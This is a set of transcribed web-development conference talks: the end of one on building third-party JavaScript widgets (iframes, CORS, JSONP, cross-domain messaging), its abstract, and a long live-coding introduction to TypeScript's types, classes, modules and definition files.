on the page are put into one element, just like you want to put all the JavaScript variables into one global JavaScript variable. And then you can scope your CSS to just apply to elements within that one element with one given ID or class. So that will be your global variable in the HTML or in the DOM. And here is also nice to use something like less or less in order to create nested CSS. Nested CSS might get a bit ugly, but at least you will be able to create one global element, so to say, and then put everything under that. So it's a lot easier to modify the CSS or perhaps if you need to change the ID or the class of the one element. And you will also encounter cases where the scripts or the styles on the page will affect the styling of your elements. And then you will need to add explicit styling to your elements to override that. And then you will have to play around with specificity and create really specific CSS rules that sets the font size to whatever you want, the padding, margin and everything, even though you won't probably need it on your test page, but suddenly you have some consumer doing something weird with some weird rules and adding a padding to all divs, and then you have to override it. So one option here is to use iframes, and I will get back to that. And an optional problem or challenge is to not be affected by styling at all on the page. So no matter what the user or the owner of the page does, your script won't be affected. And one good example here is, for instance, the Facebook widget. The Facebook has very strict branding. Everything is the same blue color, same font, same buttons. And you won't be able to change the blue color to red or do anything weird with the widget or change the like button to just a normal link, fooling users into clicking it. So if you want to do that, you have to make something more interesting. You can just try to set more specific rules if it isn't that important, but if it's really important like the Facebook widget, you need to do something else. So one kind of neat thing is sourceless iframes. I read about sourceless iframes only a while ago, and I thought they were pretty cool because they let you create a sandbox inside the DOM for styles. So any styles on the actual page won't affect the elements inside the sourceless iframe, and any styles you apply inside the iframe won't affect the page outside. So that way you get a sandbox and you can actually do some communication in and out of the iframe. So it's not as strict as normal iframe. So if you have a script running on the page, you can display two iframes and communicate back and forth between the script and the iframes or the iframes. So in order to create the sourceless iframe, you just do what we did earlier to create dynamic elements, you create an iframe element, set various properties, not setting the source, and then adding the iframe to the DOM. And after the iframe has been added to the DOM, you will get access to its content window document property, which is kind of the same as the document property on the whole page, only in the iframe. And then you can write HTML to the iframe with document right or iframe document right in this case. And then you can add style tags, script tags, dynamic inside iframe, which will then get loaded and executed all in the sandbox of the iframe. And as you have access to the document object, you can set variables and do stuff with objects inside the iframe from outside of the iframe. But also can the page. So it's not secure. So, for instance, Facebook wouldn't want to use that because then every page embedding a Facebook widget would be able to get access to the list of friends, for instance, listed inside the widget. For that, you want to use normal iframe. So, normal iframes, I guess some of you have used, where you just set the source to a page. And this will be an absolute reference to a page existing on your web server, not a relative reference, as in this example. And they give you a full separation between the page and your widget. The browsers enforce that the iframe and the contents of the iframe come from different server, so you won't be able to communicate between the page and the widget. You have some options to do that, and I'll get back to that. But in this case, the page won't be able to get any access to the stuff inside the iframe. So I have some examples here to do some cases. For instance, if you're going to make some interactive widget, this is something I made for a project. It was a widget for creating like multiple choice-style tests, where you had some dynamic editor, you could add new elements, enter the question and the answers, and reorder them and delete them and so on. And this was designed to be integrated into other web pages showing various tests. And they also had a similar player for actually solving the tests. We did this by rendering everything directly into the DOM. We didn't know about iframes at that stage, and yeah, we thought it would be easy. We just styled it. And we ended up styling it a lot. Because there are some... Well, there are a lot of styles here that are necessary for actually presenting this in a good way. And as soon as the page did something to margins or paddings or paragraphs or divs or fonts or whatever, they affected us. So we had to be really explicit in all the styling and say, yeah, we had to override all the weird properties you can think of in order to make sure this looked like we want. One of the reasons we did it inside DOM was so they could be able to override some of the styles. So, for instance, the colors and fonts, perhaps, there were a few things that we would be allowed to edit. If I were to do this again, I would probably do it either as a source with an iframe or maybe just an iframe. Because of those handboxing, I would get with the styles. The styles were hard to do. If you want to do something like this with an iframe and you want to use some of the styles on the page, for instance, the background color, then you could, with your JavaScript on the page, try to extract out the font, maybe, or the background color and then pass it into the iframe so you can set the same properties inside the iframe. Another example is embedding, for instance, a YouTube video that you don't see there. But you have seen it on a lot of pages, just the big window with the video inside. The best thing there is to use something like an iframe. If you go to YouTube and you click share, you can get the HTML code for embedding an iframe and just put that into your page. And they could, instead, have used some, or they could have provided some third-party JavaScript with some API, like embed video with the code and it would add the iframe tag to your HTML. And iframes are good for something like videos or something where all they do is communicating with the server they're loaded from instead of communicating with your page. So you have to consider the communication patterns of the application. Will the widget communicate with your page or other widgets on the page? Then normal iframes might not be a good solution. But if they communicate mostly directly with the server they're loaded from, iframes will be good. And also one good thing about iframes is that the contents of the iframe is rendered by the server they're loaded from. So instead of having to create all the DOM elements dynamically using your JavaScript, they can just be rendered on the server directly. And that creates some nice separation and it's easier to create and easier to test. So you've got to remember that iframes are not really that bad. I think iframes have bad reputation. Probably because they came from Internet Explorer. But just like XML HTTP requests, iframes in XML HTTP requests are actually pretty good things we've got from Internet Explorer. One problem you can get with iframes is if you want to render something outside of frame, either you display some pop-up or tooltip, then you're going to get a problem. Because iframes can be considered as a window into the other web server and you can't really display anything outside the border of the window. So if you need to do that you can solve it by rendering the tooltip or the pop-up from the script running on the page instead. Or perhaps creating several iframes and combining them in weird ways. But you've got to think about performance if you're going to create several iframes. If you are making a lot of different elements on the page, then iframes might not be the best idea. It will give you a performance impact. And especially compared to just rendering plain DOM elements, they're quite slow. And inheriting styles, I mentioned. You can do it with iframes, but it's a bit difficult because you have to try to find out which font will be used to use several levels of the DOM hierarchy. But it's possible. And then you have security. If you need absolute security, then normal iframes are a lot better than or they're actually the only option. But if security is not too big of a concern, then you can load things either in the DOM or view sourced as iframes. And when I say securities, then I think about is there a problem if the page actually gets access to the contents of the iframe? For instance, showing your friends on Facebook is not a good idea, but if they just say the discussion fields, then that's okay. So now we go into data and security. You got to be aware of the security boundaries in the browser. The browser always tries to make sure that your data won't leak anywhere, of course. And everything in the browser is designed so when you make a request to another website, when you do a get JSON with jQuery, your cookies can get sent. And if, for instance, a page were able to just do a get to your Facebook friend page and your cookie was sent along with it and the data returned to the page, that would be really bad. So the browsers do enforce security boundaries between servers. And then you're creating a third-party JavaScript. The script and the data for the JavaScript is most likely located on a different domain and the same with the data. So you're going to encounter these security problems. Luckily, loading scripts and images are easy, but data is not. So you can start to use just whatever you're using, like jQuery, get JSON or Angular, or HTTP for loading the data. And then we have to do some tricks in order to actually allow the request to complete. So just something more about the same origin policy in browsers. The browsers have implemented, yeah, all browsers have implemented the same origin policy, even though not in the same way. And the point is that it's there to prevent XML HTTP requests to different sites using the users own credentials. So the requirement here is when you want to make the request, it's important that it's the same protocol as the pages that you're on, HTTP and HDS. And it has to be the same host as the page, including the subdomain. And it also has to be the same port as the page. And make note here that script tags and images, as mentioned, are exempt from the same origin policy. Luckily. So that's why we're allowed to load jQuery from CDN and so on. So in order to get past the same origin policy, we need to use something called cross-origin resource sharing that W3C has created. And this is for allowing requests across different origins than protocols, and ports, by using a pre-flight options request. So every time you then make a get request to the server, the browser first sends a pre-flight request, which is an HTTP option. And then the server responds with which methods and which headers are allowed for the actual response. So the server can, for instance, say, do not send cookies or do not do deletes. And here we have implementations in all browsers, but they vary a bit. So here's an overview of the support in the browsers. And as you see, all the major browsers support it. But be aware of that Internet Explorer 8 and 9. Only support get and post using course. And also you get problems if you want to use custom headers or send cookies. So authentication is a big problem here. So then you've got to do something like putting authentication tokens in the URLs or something. And you also need to be aware of that if your users are using Internet Explorer, you're going to encounter the Internet Explorer security sounds, if you're unlucky. And the problem here is you might have done everything correct with course and things are working in all browsers. Things work perfectly for you and in your local environment. And then some system administrator might have added your domain as a trusted site. And then web pages on the Internet won't be able to make requests to your trusted site. So then you won't be able to get data. And if this is set, there's nothing you really can do to get around it unless you've actually talked to the IT administrator and get them to remove your site from trusted sites. And this might be a big problem. So one thing you can do in order to load data from the server is to use JSON with padding, JSONP. JSONP is actually quite good workaround for same origin policy. It just works. It's very simple. It only works for get requests. So if you just want to fetch some simple data to display on the site and you are not going to include anything like any user secrets, for instance, Facebook, France, then JSONP is very good. So JSONP is actually just a script tag. So it's just a JavaScript file. It's not a JSON file. So you refer to JavaScript file with the callback. And then when you receive the JavaScript file, your JSON is returned to the page wrapped in the callback. So as soon as the JavaScript is parsed and executed, the callback will get called with the data you requested. And this works quite nice using jQuery. So for instance, if you do a get JSON and it notices there's a callback parameter in the URL, then jQuery will auto generate the callbacks for you and the API is just the same as using get JSON normally. And if you want to send data, you can do it through image tags. Google Analytics, for example, uses this in order to send analytics data. So just by creating a new image and setting the source, this request will be made to the server. And then you can add some parameters. Just be aware of the maximum length of the URL in various browsers and various web servers. So this is quite nice for just fire and forget, perfect for logging and logging statistics. For instance, this is a recounter. It would be perfect just implementing using this just to send data, not caring about the response. And then the web server can just return a 200 OK without no image, of course. And nothing is added to the DOM here. And then we have iframe messaging. Iframe, as I mentioned before, are kind of like windows or tunnels into a different server. And the nice thing is that everything running inside that iframe can communicate freely with the server. And there are some things you can do to actually communicate with the iframe as well. So iframe supports simple messaging. And it's quite hard. But, yeah, it's quite useful when you get it working. Because then it can work across all browsers and it works quite nice. And then you can tunnel jQuery and other messaging libraries through the iframe. So some suggestions in order to do communication is to consider course first. As it's standard, it's getting wider and wider support. And all newer browsers, not caring IE8 and IE9, support it quite well. All HTTP methods and everything work. You just have to create something to return that options response. And the browsers will just handle it transparently. You don't have to request the options response yourself. If you're only getting there, I recommend you just use JCP. It works. It works well across all browsers. Just be careful not to include anything user personal or anything in that response. Because every web page can just include a reference to mydata.js with a callback. And the user's cookies will get sent along with that request and you'll get a response with, for instance, personal user information. And iframe messaging works well when you get it working. Then it's, yeah, you can just set it up, get it working and not care about it anymore. So take a look at ECXDM, which is a good library that abstracts away all the other things about iframe messaging. As you got to do various tricks in various browsers in order to get it to work. In IE7, I think it uses flash in order to do some tricks to get some messages passed into the iframe. So providing an API, this is actually just a single slide. Because I have talked about most of what you need to do in order to provide an API. You just got to get the script on the page, as I already talked about. You can forget about DOM because you're only going to provide some JavaScript objects registered in the global namespace. And, yeah, just make sure not to expose a lot of private properties and private objects inside the global namespace because people might start to use your privates instead of just to define public API. And of course, your API needs to be stable at the various or at certain degree, depending on what you need to do. So, yeah, that's not really much more to say here. So just a summary. You got to get your loading loader really perfect to begin with. Get it right and then start using it. And as soon as you got that loader script running and loaded asynchronously, you can keep modifying it to fit your needs. Maybe loading parts of your scripts in parallel and, yeah, doing various tricks with the page. You got to be careful when you're doing changes to the DOM because you don't want to break the pages. You'll make your customers mad. And when you're going to get data or send data to the server, I can't really say anything else than good luck. It's quite hard to get it working perfectly, but it won't work. So hopefully it stays working. So some suggested reading. I got inspired to do this talk after I read this book. We used it a lot when doing some of the scripts we were doing at my client. And this goes through all the points I talked about in this presentation in addition to a lot more. And there's quite some finer details on authentication and cookies and eye frames that varies a lot between the browsers. So they have very good tables and overview of what works where and when. So any questions? Yeah. Well, one, well, require.js does about the same. It adds a script tag to the page with the script you're requiring. The problem is you first have to require.js. So you've got to require.js down to the page synchronously first before you can start loading scripts asynchronously. So you still get the same problem with getting the first script on the page asynchronously. Yeah, up there. One question. Is async loading scripts work with the script that do DOM manipulation like knockout in Angular? Yeah, I think that should work. I'm not quite sure. You probably just want to make sure you're doing the DOM manipulation in the correct stages of DOM rendering. For instance, if you have loaded and run before document ready has fired or after document ready has fired, just make sure the elements that you actually need are going to bind to existing the DOM. That shouldn't be a problem. Yeah. I guess that's it. Thank you. Thank you.
|
When building a web page composed of different parts, the different parts can be combined at different stages of page rendering. Everything can either be loaded on the server before being returned to the client, or the client might receive the minimum amount of data immediately before loading individual components using JavaScript. The first way might be more straight-forward, but the latter both allows for looser coupling between services as well as allowing better user interation with the various page components. There are many scenarios where third-party JavaScript provides a good separation of concerns. You might be building a site with several secondary features like comment fields, feedback dialogs or shared toolbars, or you might be providing widgets or an API for other websites to consume. All of these cases are good candidates for writing so-called third-party JavaScript applications. When writing JavaScript that should run on known or unknown sites there are a lot of considerations to take into account. Should the application provide a near-seamless experience, giving the impression that the components are a native part of the parent page - like for instance a login widget, or should the widget give a branded and more isolated impression like the Facebook widget? Can the site be trusted? Should the web site or the users be allowed to interact with the application? Depending on the answers there are a number of different approaches, ranging from tight integration to sandboxed iframes. In this talk I will go into detail on the following subjects: - Loading and initializing the JavaScript application, - Running JavaScript and rendering HTML in unknown environments, - The balance between integration and sandboxing, - Communicating with other sites and components, - Security, and how to work around browser constraints
|
10.5446/51523 (DOI)
|
So, welcome everyone. I'm glad to see that so many actually showed up here. It was quite – I had some competition at this time now with Uncle Bob and another JavaScript check, so I'm actually quite pleased with how many have – that have showed up. So, my name is Torsen Nikolajsen. I work as a senior consultant at Beck Consulting here in Oslo. I've been doing web development for many years now and I've been doing a lot of JavaScript the last few years. If you want to contact me, you can reach me at Twitter, LinkedIn or Google Plus using my username here. So, I know why you guys are here. Like I said, you have actually chosen this track now. There's a lot of other interesting things. So, I guess all of you are actually motivated to learn TypeScript today. And I won't spend that much time motivating you and explaining why we need TypeScript. I'll just mention it shortly. And an interesting thing was that during the earlier sessions here, John Syme, when he was talking about F-Sharp mentioned JavaScript. And I'll come back to that a bit later. So, I was actually going to do a pun here with walking you down memory lane, just explaining why we actually – I was going to explain all the troubles that we have had with JavaScript over the years. And actually, I also just wanted to show you this drawing, which I love, just to tell you about the browser wars and how we have come to a standardized way of doing web development right now. So, let's just take a quick look back at how we did JavaScript development when it started booming. So, we did – I have to say this before we start – I really like JavaScript, so I'm not going to trash talk JavaScript. But if you look back, many developers neglected JavaScript as a programming language. It didn't consider it a true programming language. So, actually, people actually wrote jQuery, not JavaScript. And many of the apps they generated was just one huge file called script.js, which was unmaintainable, and only one guy knew how to do stuff in it. It was the spaghetti code. But we have gotten a lot better the recent years. There has been a lot of focus on JavaScript, and it has established the stages as a real programming language now. And we actually managed to build quite large applications today. Just have a look at Gmail, Facebook, Trello, and Cloud9 IDE. Cloud9 is actually almost entirely written in JavaScript, both frontend and backend. And that's impressive. But in order to build these big applications, we require tools that lie outside JavaScript. We have to have script managers like – or dependency tools like Require.js. And in order to build this in a smooth fashion, we require tools like Grunt, or we have to use something in Maven, or in MS Build, or extra steps. We have to do a lot of extra. And once we have managed to build a quite large application, if we don't follow all the good practices, design practices on how to do proper JavaScript, and we try to fix one thing, it all just falls apart. And the reason for that is that there is a little glue that holds JavaScript apps together right now. The only glue that is common is unit test and integration test in JavaScript code. And you guys know that we aren't doing enough of that. So when we write JavaScript, we can easily refactor code or do stuff like that to it. And the reason is twofold. Again, we developers tend to neglect JavaScript as a language, and we also don't do all the good practices. And JavaScript as a language don't have that many means of encapsulating and structuring your code. You can use closures and stuff like that to simulate that you have some scoping. But that doesn't work really well in large scale, in my opinion. So I'm going to tell you today how TypeScript can help to mitigate some of these issues. So today we'll be looking at what TypeScript is. We'll dive right into some features, and I'll be doing a lot of live coding throughout the sessions. And we'll be looking at the ecosystem that TypeScript exists in, and I'll do a recap and give you my final thoughts on what is happening right now with TypeScript and what is going to probably happen in the short future. So let's just check out what TypeScript is on a high level there. It is technically a super set of JavaScript. That means that it actually has all the features and syntax features of JavaScript, but it's just adding more features on top of this. So you can actually write JavaScript inside of TypeScript. It will still compile. And it is one of those languages that compile down to JavaScript, so you don't need a browser plugin like Google Dart has actually. It requires you to either compile to JavaScript or run it as a Dart VM. So this compiles down to good JavaScript code. And you can compile it using the official node package, or you can actually use a Visual Studio plugin which makes this really smooth in Visual Studio at least. Like many other things in the JavaScript ecosystem, TypeScript is also open source. All the code is actually available on Codeplex and can follow the development, track the issues, and actually talk to developers. And it's worth noticing that this is actually a Microsoft initiative to write TypeScript. And that brings us over to this cheery looking guy, Anders Helsberg. He's most notably known as the lead architect for C Sharp. And I think that lends credibility as he is actually the designer of TypeScript as well. You can see that his previous work on C Sharp influences the way that TypeScript works. So if you like C Sharp, you will see some familiar elements in TypeScript. Another brilliant decision of the team that is creating TypeScript is to align it with the upcoming ECMAScript 6 standard. If you don't know what ECMAScript is, the simplest way to put it is that it is the standard for JavaScript. You can think of this as that. And the next version of ECMAScript, version 6, defines how classes and modules should work and some other language constructs. So by aligning with this, that means that TypeScript will look very similar to what JavaScript will look in the future. Another benefit is TypeScript has already implemented some of these features that are still a draft now. And that means that you can actually use classes and modules now instead of waiting for JavaScript to come along and add that. So let's look at some of the new features in TypeScript. We will be looking into type annotations, classes, interfaces, modules, our functions, and a few more during this session. So TypeScript is probably one of the most unique features in TypeScript. It works pretty much like you expected to work in other languages. And you can apply Types to objects, parameters, fields, and return values and some other things in the language. You have some primitive types that is unique for TypeScript. It's string number, and number is not, you can't separate between integer and float numbers. It's the same number type that you have in JavaScript, which is the float. And you have the boolean and you have any type. The any type is the default fallback type. So if you don't specify a type on a variable, then it will be of type annus. You can assign anything to it. And you have something called void. You have that in C sharp, of course, but JavaScript does not have that concept. So in TypeScript, you can explicitly say that this function does not return a value by using void, as you would do in C sharp. Another brilliant thing about TypeScript is that it uses, it gives you the option to choose whether you want to use types or not. And this has two advantages. You can actually migrate your code base, existing JavaScript code base over to TypeScript by applying types step by step by step as you go along. And another thing is that you can use types where you like. This is one of the things that Don Seim talked about earlier with F sharp. You have statically typed languages and dynamically and you have something in between. And that's where TypeScript is right now. You can choose what you want. So you get the best of both worlds. So let's look at some syntax. This is a classic thing you would see in JavaScript. And since I haven't annotated with the type, the type is annie here. That means I can assign a number to it. I can assign a string. And I can assign an object to it. No problem. So I can also do static typing. Here I say that this variable should be a string. So if I try to assign a number to it, the compiler will give me a warning here. So, and TypeScript also has type inference. That means if I declare the assigned value of the variable at the same time as I declare it like so, it will inference that offer is a string. And therefore, if I later try to assign a number to it, it will complain because it has inferred a type. So I'll just show some quick demo of how this can, what this can look like. So if I were to create a function called add contact, and I say I want a name and a phone. So this is what you would have in classic JavaScript. So if I were to call this, hmm? We don't see anything. Oh, sorry. The screen switch didn't work. All right. This should work. All right. So what you're seeing now is classic. This, again, this is look like JavaScript. And if I were to treat this as a black box, if I didn't know what this function does, I would call it like so, and I'd see that here we have two parameters. I don't know the type of that. So if I was, if I didn't know better, I guess that it's the first parameter's name. Okay. Hmm. Probably if it has a name. That's true. And the second parameter's phone. Yes, probably has an Android. So I don't know anything about how this expected to work. So with TypeScript, I can give types to this. So you see, I can annotate this to be a string, and then I will get a squiggly line here, which says, hey, the compiler won't be complaining. So here it says that this input here does not match the signature. So in order to fix this, I have to make this a string, and it will work. So I can continue adding a number to, especially if the phone is the number, I'll get the same error here. And to fix that, I will have to add a number here. So you see here, the compiler actually prevents me from making silly mistakes. And I can also assign the return value from this function to be a string. Again, the compiler will complain here because the function is not returning anything. So I can return something here, and it will go away. So let's look at the compiled code here. This is TypeScript, and here we have the JavaScript code. So again, it's, if I just center this, the code looks really similar, just without types here. And this last line here is just source mapping. That's used for debugging. So you can map a line in TypeScript over to a line in JavaScript. So let's go back to the presentation. Does this work? Yeah. Awesome. Great. Just going to go quickly through interfaces. Interfaces can, you probably know what they can be used to, but declaring them looks like so. And this, the only thing that's special here is that you have a way to say that this is optional. You can choose to not include this in the type that implements this interface. So common usage for interfaces is to have our class implement certain members, like a function of fields. And you can also ensure that if you have a parameter that you pass your function, you can ensure that this has some characteristic by using interfaces. And we're showing some demos of interfaces along with other code. So classes is, again, this is what's been proposed with ECMAScript 6. Classes are mostly like in other languages, but you should think of it as a container in JavaScript. So you can have constructors in them. You can have fields, functions. And if you are feeling really brave, you can actually use properties, which is something that's not really good, really well-supported in older browsers. But JavaScript has them. And you have this get set syntax for local fields. You actually have wrap them, get some extra encapsulation. So I'm just going to do a demo of classes and how they work. So in this example, I'm going to make, thank you, I'm going to forget that, this worked better than last time. So I want to create a class called superhero, like so. And you see on the right side here, it's already compiled that into JavaScript code. So you see that actually creates quite sane, readable JavaScript code. This is the way I would have done this if I wrote it in JavaScript. And now I'm going to create the constructor here. And in this constructor, I'm going to pass in a parameter called name. I want that to be of type string. So I want to assign that to a local field called name. And here the compiler will complain because this class does not have that field. So I have to declare it in the class. So the simplest way to do that is just like so. So now I have a local field. And this is okay. This is the way you would have done it. But there's a shorthand also for doing exactly the same thing. I can remove this too. And I can add public in front of here. And it compiles to the same code and works the same way. So that's just a shorthand for creating local fields. This can get messy if you don't use it correctly. So the next thing I want to do is create an interface. So I'm going to create an interface called I have superpowers. And that is going to force this implementation to have a method called get superpower. And I want that to want to return string. So that's my interface. And then I can say that this implements, this is things you can't do in JavaScript right now. So you can't drive the design or enforce the design in your code right now in JavaScript. You have to use other tools for that. So I say I have superpowers. And now the compiler will complain again because, and it gives really good error messages here. So if you see here, they says that the type super is missing the property get superpowers. So it's really helpful here. So all I have to do is implement that is just say get super power. And I have to implement this one and make sure that it returns a string. So clean code is my superpower. So that works now. And also another thing, if I had returned the wrong type here, notice that I haven't specified here which type this one returns. It's inferred and it therefore matches with the interface. So if I had returned a number here instead, I would actually get the compiler error. So it's a bit more discrete here. But here it says that it does not match. Doesn't matter what it says. So the next thing I want to show you is concept of accessibility. So this is public by default. I can actually add a private method in this code here. So get secret power. And this one will not be visible from the outside. So if I declare I have a hero, superhero, I can see that this object has get superpower and names, public fields. But I don't see this one because that's not publicly available in this type. But it was interesting here. In the compile code, you'll actually see that it's being defined as a regular function on the object. This is because JavaScript don't have a notion of public and private accessibility. So the last thing I want to show you in the classes is sub-classing. So I can do a super-duper hero which extends a superhero. And here I can also make a constructor. And this constructor I'll choose to take in a name and keep it like so. And when you do constructors in TypeScript or in sub-classes, you always have to call the super, use the super key word to call the constructor in the parent class. This is an thing that's enforced. So now I have made a sub-class of this. Yes. So you see that this is similar concepts that we already have in other languages. And again, doing this in JavaScript would have required you to write something really similar to what you're seeing here. It's not formatted as neatly, but you would have to do the same things here in JavaScript. So let's go back to the presentation. Like so. All right. The next thing I want to show is arrow functions. Arrow functions is simply just a short hand for writing methods. There's one special behavior in TypeScript, and that is that it binds to this keyword lexical. I will show you what that means by demo. But first, I just want to show the syntax of how this looks. So this compiles down to this JavaScript code. And again, you see here the input parameters goes here, and then you have a method body. And maybe this example is a bit clearer. But here you have some code that compiles down to this. You assign the function to a variable called sign, and then you pass in an input parameter, and you have a method body. So this is all that this syntax does. And the main application for this is using, for instance, working with callbacks in the user interface when a user clicks a button or when they get WebSocket data or someone has triggered an event. And it's also really useful for working with code that has functional style. So again, a demo. Hope you like demos, because I have a lot of them. All right. So in this demo, I have created this web page where I have a button here called demo button. Thank you very much for noticing. This is something I should have prepared better. All right. Now you see. In this demo, I have a web page here where I have a demo button on the web page, which I will use later. So I'll create a new class called button handler, like so. In this class, I want to have a constructor that takes in the HTML button. And the funny thing here is that in this demo, I'm actually going to show you quite a few things about TypeScript. So in this, you have this DOM API that's in the JavaScript already. And TypeScript has made strong typing upon that. So I actually have an HTML button element that comes directly from the DOM. So I can say that I want a DOM button of that type in my constructor. And I can actually just do like so. Then I have a sign to the public field. And I also want this class to have a private field. So it's a secret. Shh. Don't tell anyone. And what I'm going to show you now is a very classic example of what it's a bit of a hassle doing the same in JavaScript. So I want to, on the onclick event on the button, I want to trigger a callback. So I'm creating a function here that will be the callback. And what's interesting thing here is it knows that this type is of mouse event because that I'm using the strongly typed HTML button element. This is a quite nice feature that you get by using this. So what I want to show you, I want to alert this.secret. Like so. And in order for this to work, I'm going to show you another thing here. I want to again have this DOM button as HTML button. So I want to declare a variable here. Then I want to assign it on the line here. Document.getElementById, classic, no jQuery. And I call it the demo button. Like so. And now I see the compiler complains here. And the reason for that is that I get an HTML element back from this method. And I'm trying to assign it to something that's an HTML button element. So now I can actually show you casting in TypeScript. And you do that by using angled brackets like so. So this type inherits from HTML button. So that's what I need to do to get this to compile. So now I can actually call the button handler constructor and pass in my button like so. And this compiles. Now I can open this web page. I hope it's a star here. So what have I done? Like so. I can open this web page in my browser. And yes, I probably do that. So if I push this button now, I'm expected to see shh, which was the local field. But I get undefined. And this is a regular problem in JavaScript. And this is expected, by the way. And the reason for this is that when you are doing callbacks in JavaScript like this, the disk keyword here actually points to the element that triggered it. So it actually belongs to DOM button here in this context. And the easiest way to fix this is by using arrow function. What arrow function does, you see there was really not much change here in the code. But arrow function now binds the disk keyword to the context. And the context here is that it's within a class. So this now points on the class. So if I run the same code again, it's been compiled in the background, I actually get the string that I expected to see here. So I think, yeah, that was what I wanted to show in this demo. So, next one. So modules. Another great way of handling encapsulation in TypeScript. They are similar to namespaces in C sharp and packages in Java. And again, this is something we have, I think this is one of the issues in JavaScript right now. And they have addressed it in ECMAScript 6 by adding modules there. But you can right now have encapsulation in your code. And modules are really easy to import between code. So it actually makes it easy to reuse code. And you can compile these modules to either common JS or AMD. And if you don't know what that is, the best way to learn about that is actually talk tomorrow that will be about required JS, which implements the AMD pattern. But it's just a JavaScript or node way of actually getting source files between or runtime in an asynchronously way. So the syntax for creating modules is like you expect. You can have classes, functions and variables inside a module. And in order for them to be accessible outside a module, you have to prefix them with the export keyword. That means that they are publicly available. And if you don't have the keyword in front of them, they will be internal modules. So you're going to have helper classes and helper functional local variables inside that and not exposed. So it's a great feature. In real world, we are probably going to reference a lot of modules in our projects. So there's two things here. There's something I call internal modules. That is, if you don't have a big project and you are manually setting the script blocks in the header in your HTML file, you can use internal modules. So all you have to do then is just in top of each type script file, you have to add a comment like so to tell it that, really, this file and use the types that are inside this one. The downside by using internal modules is that you have to, if the application grows, you have to keep the sequence of the scripts correctly. So you have to ensure that all the scripts are loaded in the correct sequence up front. This doesn't scale very well. But external modules is probably more scalable. And it is when you use, when you use like a script loader, like require.js to handle this. I will show you in a demo how this actually works. So I want to be showing a lot of the basic things. I actually go right into the advanced thing. And I have prepared a demo here so I can actually just talk you through it. So just switch over to duplicate. I remembered it this time. All right. So I prepared a web page here which is using require.js. I already don't know this script. So the only thing that require.js knows about is that when require.js is loaded, it is going to load a file called main.js. That's the first thing that require is going to do. So in my TypeScript file, I have told it to look for, again, this is the only place I have to declare TypeScript or make the application know about TypeScript. So what I'm doing here is that I'm actually saying, okay, you need to read the types that's inside this definition file. I'll come back to that in the next demo. And that is the only place that you need to, again, know of require. So what you do here is that use require syntax. What this means is that when you load the application, look for a file called bootstrapper.js, load that entire module, and when that module is loaded, it will then be passed into this function as a parameter. And on that object, I have created a function called run app, which I will show you now. So the only thing this one has, it exports a function called run app. You see, I don't have to wrap this inside a module in this case because I'm using the external thing. And the interesting thing here is that inside here, you don't see any require.js syntax. You actually see that I import the module here. This actually looks for a file called view.ts. So I have a dependency to that module. So if I go into this module, I see that I expose a class called registration view. And again, I see that I have another dependency here. Again, there's no require.js syntax. This is typescript syntax. And if I go into the utils, I see that this is kind of a leaf node. So you see that I have nested dependencies here. And if I were to handle that within the script block here, I had to know which dependency needed which location, at which time. So you have to get the correct sequence. But if I'm really, really lucky now, this should work in the browser. And I can show you what happens. So like so. Yes. So let's check to console. Nope. And I know what's wrong here. There's an issue with loading. Awesome. There it goes. So what it does now is that when I load the page, require.js takes over and figures out which scripts need to be loaded first. So the only two files that are loaded first here are require.js and main. Then it knows that busstrapper, review and utils has to be loaded in sequence. And it handles all of this for me. So I don't have to know about that. And that's a great feature for doing large-scale applications because then you actually don't have to think about how the scripts are loaded. I think that's one of the key elements to getting scalability. All right. So. So. All right. I have something to say about parameters. I'm just going to show you some slides here. There's some really useful new syntactical sugar that makes it easy to write flexible functions. So you have default parameters, which means that you can set the default value. So you can either call it like so or pass along a boolean value here. This is really useful. And you also have optional parameters like I showed you earlier. So you can actually choose to pass in options or not. So you can call this function in several ways. And you also have something called rest parameters. This is also a part of ECMAScript 6, this thing, which you can compare to var args in C sharp. So what's going to happen if you pass in, you can have an endless number of parameters here. But you get the first one as the winner and the rest will actually just be in an array called the rest here because that's what I called it. And we have something that I think is one of the coolest features of TypeScript. It's type definition files. And before we show you them, I have to explain what ambient declaration is. It's a way of saying to TypeScript that, chill, I know that I get this variable from somewhere outside TypeScript. Typically, if you have loaded TypeScript in the script tag earlier. So just chill. I know what I'm doing. That's what you're saying to TypeScript. And it also, if you do use the clear word, it will actually not include this variable assignment in the compile code. So you just omit it totally. And there's something called type definition file. These are just a single file that defines all the signatures of the library that you're using or dependent on. For instance, if you're using jquery.js, TypeScript won't know about the types that it has. But by using definition files, you can actually get strong typing on jquery. So you can actually use it in a strong manner in the TypeScript files. This actually means that you get all the completion help and intelligence on jquery. That's really helpful. And the way this works is that you use this reference thing I showed you earlier in the top. And all of these type definition files does add an ambient declaration to say that this variable exists somewhere in the code. And there's a project, or a GitHub repository called definitively typed, which is a great repository for finding all kinds of definition files. So you'll probably find the framework you're using. So you knock out Angular, jquery, node, require.js. Yeah, it has a lot here. So you'll probably find some of the frameworks you're already using. So don't have to create these files yourself. So I'm going to show you quickly how this works. Like so. Just close all these files. I have now a definition file for jquery. And again, all it contains is just interfaces. It does not contain any implementation of jquery. So you can just see that it contains a lot of interfaces here and different functions. This doesn't say anything much like so. But what you can do is if I am writing a jquery function here, I can actually just write it like so. If I have to write something like this. And I don't get any auto-completion here because it doesn't know what type this returns to me. So I know there's a text probably, or maybe there's a function called add. I don't know. Can add some text. Hello. And this doesn't work. What I could do just to get the compiler off my back, I could use declare variable here. Again, I know what I'm doing. I know this library works and I have loaded this already. It's not strongly typed. So that's the simplest way to get it to work. But I can actually do one better. I can actually use this type file. Like so. You see it actually adds now reference to that file. And what that does is give me strong typing now. So now it knows that the type of this dollar here is of type jquery static. And that means that I actually get strong tooling here as well. So now I can actually browse all the possible methods I can use on this type. I think that's a great thing. So if I were to call, for instance, text now, can I set the text or can I get the text? Let me see. Okay. Here I have all the overloads of this one. So I can actually scan through those. So I see, okay, this takes in a string and I can return, it can return a string. Great. So you actually can, if you're new with the framework, you can actually easily learn this. And a great example to show that is actually underscore. I don't know how many have tried underscore, but don't have that definition following, but I can try installing it. So I'm using NuGet package manager to just get this source file. And it, so I have it on the file system. I'll just browse it. Code, demo, packages underscore. Okay. This is great. Like so. I can just drag it into there. Nope. Like so. And now we shall do is again. So and again, I always look up the documentation underscore. So again, I can just reference reference.file. This is way, is dragging and dropping it. That is a plugin called web essential that helps me out with this. So now I get the code completion on underscore. And that's, I need that a lot to help me understand how I do, for instance, the reduce function. What do I do there? So I can actually see the signature here, what, the sequence of parameters here. So back to slides. How am I doing on time? 20 minutes or so. All right. I want to talk a bit about tooling. TypeScript has already gained a lot of 